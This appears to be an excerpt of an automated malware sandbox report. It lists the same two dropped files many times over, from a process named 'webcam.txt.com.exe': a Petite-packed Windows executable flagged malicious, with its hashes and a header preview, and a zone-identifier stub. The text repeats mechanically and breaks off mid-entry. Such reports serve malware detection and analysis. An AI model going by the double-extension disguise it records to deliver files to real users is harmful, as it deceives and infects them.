                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
